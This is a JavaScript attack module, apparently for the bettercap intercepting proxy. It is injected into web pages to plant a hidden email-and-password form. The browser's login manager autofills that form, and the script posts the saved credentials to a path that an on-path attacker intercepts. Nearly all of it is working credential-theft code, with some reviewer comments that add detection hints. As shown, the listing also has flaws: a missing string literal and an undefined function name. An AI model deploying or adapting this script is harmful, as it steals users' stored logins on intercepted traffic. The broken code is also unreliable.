login-man-abuser.js
/*
* Ref.
* - https://github.com/evilsocket/bettercap-proxy-modules/issues/72
* - https://freedom-to-tinker.com/2017/12/27/no-boundaries-for-user-identities-web-trackers-exploit-browser-login-managers/
*
* The idea:
*
* - On every HTML page, inject this invisible form, which grabs credentials from login managers.
* - POST those credentials to /login-man-abuser; since we control the HTTP traffic, we'll intercept this request.
* - Intercept the request, dump the credentials, drop the client to a 404.
*/
// Script that the file header says is injected into every HTML page.
// NOTE(review): as rendered here the assignment has no quoted right-hand side;
// presumably the lines below were a string literal in the original file and the
// quoting was lost on this page — confirm against the original.
var AbuserJavascript =
// injectForm(visible): builds a <div> holding a <form> with one email input and
// one password input, then appends the <div> to document.body.
// When `visible` is falsy the container is given display:none, so the form is
// never shown to the user.
// Defensive context: per the file header and the referenced article, the form
// exists to receive values from the browser's login manager. A login manager
// that fills fields only after an explicit user action should leave these
// inputs empty.
var injectForm = function(visible) {
var container = document.createElement("div");
if (!visible){
// Hide the whole container rather than the individual inputs.
container.style.display = "none";
}
var form = document.createElement("form");
form.attributes.autocomplete = "on";
var emailInput = document.createElement("input");
emailInput.attributes.vcard_name = "vCard.Email";
emailInput.id = "email";
emailInput.type = "email";
emailInput.name = "email";
form.appendChild(emailInput);
var passwordInput = document.createElement("input");
passwordInput.id = "password";
passwordInput.type = "password";
passwordInput.name = "password";
form.appendChild(passwordInput);
container.appendChild(form);
document.body.appendChild(container);
};
// doPOST(data): serialises `data` with JSON.stringify and sends it in an
// XMLHttpRequest POST to the relative path /login-man-abuser with
// Content-Type: application/json. The onload handler only writes a fixed
// string to the console; the response body is not read.
// Because the URL is relative, the request targets the origin of the page the
// script runs in; the file header states it is meant to be intercepted in
// transit rather than handled by that origin.
// Detection note: the path is a constant in this listing, so a JSON POST to
// /login-man-abuser on a site that defines no such route is a usable indicator
// in proxy or web-server logs.
var doPOST = function(data) {
var xhr = new XMLHttpRequest();
xhr.open("POST", "/login-man-abuser");
xhr.setRequestHeader("Content-Type", "application/json");
xhr.onload = function() {
console.log("Enjoy your coffee!");
};
xhr.send(JSON.stringify(data));
};
// sniffInputField(fieldId): looks up the element with the given id and, when
// its value is non-empty, returns a one-property object holding that value.
// When the value is empty it schedules another call to itself with the same
// id after 200 ms and returns undefined for the current call.
var sniffInputField = function(fieldId){
var inputElement = document.getElementById(fieldId);
if (inputElement.value.length){
return {fieldId: inputElement.value};
}
window.setTimeout(sniffInputField, 200, fieldId); // wait for 200ms
};
// sniffInputFields(): walks every <input> element in the document, logs each
// element's id to the console, merges the per-element result into `data`
// with Object.assign, and passes the merged object to doPOST.
// Scope note: getElementsByTagName("input") returns all inputs on the page,
// so the site's own input fields are visited as well as the injected ones.
// `data` and `output` are assigned without a declaration in this listing.
// NOTE(review): `stringsniffInputField` is not defined anywhere in this
// listing — confirm the identifier against the original file.
var sniffInputFields = function(){
var inputs = document.getElementsByTagName("input");
data = {};
for (var i = 0; i < inputs.length; i++) {
console.log("Will try to sniff element with id: " + inputs[i].id);
output = stringsniffInputField(inputs[i].id);
data = Object.assign({}, data, output);
}
doPOST(data);
};
// sniffFormInfo(visible): entry point of the script. It injects the form and
// then runs the input sweep straight away, in the same call.
var sniffFormInfo = function(visible) {
injectForm(visible);
sniffInputFields();
};
// Invoked with false, so the injected container is created with display:none.
sniffFormInfo(false);;